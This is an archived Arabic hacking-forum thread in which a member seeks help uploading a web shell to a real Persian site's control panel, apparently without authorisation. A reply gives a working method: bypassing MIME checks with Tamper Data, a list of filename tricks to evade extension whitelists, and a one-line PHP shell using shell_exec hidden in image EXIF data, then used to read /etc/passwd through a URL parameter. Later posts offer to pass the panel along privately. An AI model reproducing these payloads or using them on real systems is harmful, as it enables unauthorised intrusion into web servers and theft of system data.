:: vBspiders Professional Network :: - [مساعده] اريد طريقة رفع شل جديدة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)

- - [مساعده] اريد طريقة رفع شل جديدة (http://www.vbspiders.com/vb/t69292.html)

اريد طريقة رفع شل جديدة

كما هو واضح بالعنوان لوحة تحكم لسكربت برمجه خاصة لموقع فارسي

وجدت مكانين لرفع الملفات الموقع الاول يقبل ملفات بي اتش بي ولكن عند الرفع يغير الاسم ولا يغير الامتداد يبقى امتداد الملف كما هو بي اتش بي لكن لا يعمل يأتي خطأ
Internal Server Error

المشكله تم رفع شلات كثيرة بعضها مشفر والاخر غير مشفر لدرجة تم رفع شل بيرل ايضا نفس الحكاية حاولت ارفع هتاكسس ولكن مثل ماخبرتكم يغير الاسم الى 13124134434 عشوائي
حاولت ارفع ملف بي اتش بي بداخله كود يعمل هتاكسس جديد ولكن نفس الحكاية

----------------------------------------------

الموقع الاخر رفع صور تمت تجربت اداة tamper Data فيها واداة live http header ايضا دون جدوى مايرضى يرفع http://vb.ehcommunity.com/images/icons/icon10.gif الا ملف صور فقط

الحل ؟؟؟ :dunno:

رد: اريد طريقة رفع شل جديدة

اسم السكربت يا اخ حتى نحاولو نجرب معاه

رد: اريد طريقة رفع شل جديدة

برمجه خاصة أخي :(

أشكرك لإهتمامك

رد: اريد طريقة رفع شل جديدة

هناك طريقة اعرفها لم ارها في اي منتدى عربي ابدا
وهي حقن شل مجهري يتكون من سطر واحد في الميتا داتا الخاص بصورة
ثم اعطاءه الاوامر في شكل بارمترات في الرابط
البرنامج المستعمل exif pilote
ساضع شرح ادا تطلب الامر

رد: اريد طريقة رفع شل جديدة

لوكان هنالك شرح أكون لك من الشاكرين :)

رد: اريد طريقة رفع شل جديدة

عند رفع الشل عادة المواقع تكون لديها تدابير امنية تمنع دالك
و كل إجراء أمني لديه طريقة تخطي المناسبة لدالك سوف اشرح طريقة الرفع حسب الحماية المستعملة :santa_1:
الحماية حسب نوع الملف

كود PHP:

   if($_FILES['userfile']['type'] != "image/jpg")

لتخطي هده الحماية نستعمل تامبر داتا

الحماية باستخدام اللائحة البيضاء
وهو جدول في ملف البي اش بي يحتوي على الامتدادات المسموحة

كود PHP:

   $valid_file_extensions = array(".jpg", ".jpeg", ".gif", ".png");

لتخطي هادا النوع من الحمايات نتلاعب ياسم الملف
مثلا

اقتباس:

shell.jpg.php
shell.jpg.PhP
shell.php.xxxjpg
shell.php;.jpg
shell.php%0delete0.jpg
shell.php.test
.phtml
.php3/.php4/.php5

الحماية باستخدام الدوال الخاصة بالصور
في هده الحالة المبرمج يستعمل دالة خاصة بالصور مثلا الدالة التي ترجع قياسات الصورة للتاكد ان الملف الدي تم رفعه هو فعلا صورة

كود PHP:

   $imageinfo = getimagesize($_FILES['userfile']['tmp_name']);

في هده الحالة كل الطرق السابقة سوف تفشل و الحل الوحيد هو رفع صورة حقيقيقة
لذالك نذهب الى برنامج الرسام و ننشئ صورة صغيرة بحجم الايقونة ونحفظها في سطح المكتب
نحمل برنامج لتعديل الميتا داتا الخاص بالصورة مثل GIMPاو exif pilot
انا سوف اشرح exif pilot
http://exifpilot.com/ الموقع الرسمي للبرنامج
بعد التثبيث نفتح الصورة بالبرامج نضع الكود الدي يمثل الشل المجهري في التعليق

كود PHP:

   <?if($_GET['lol']){echo"<pre>".shell_exec($_GET["lol"]);}?>

كما هو موضح في الصورة
http://im52.gulfup.com/PVZ23p.png

الكود معناه ادا وجد متغير او بارميتر اسمه لول نفد مايحتويه المتغير
ثم نرسل امر فتح الملف etc/passwd

اقتباس:

www.somesite.com/shellPath/shelleName.php?lol=cat/etc/passwd

و الاستغلال يكون بهده الطريقة لوول

http://im80.gulfup.com/tSW5ua.jpg

لا ادري لمادا لم ارى اي عربي يقوم بهده الطريقة هل يريدونها برايفت ؟؟ لاادري
على كل حال اتمنى ان اكون قد افدتك اخي

رد: اريد طريقة رفع شل جديدة

شكراُ لك أخي ولكن تم التجربة من غير جدوى :)

من يرد لوحة التحكم لكي يحاول فلا مانع لدي :)

رد: اريد طريقة رفع شل جديدة

ارسل اللوحة على الخاص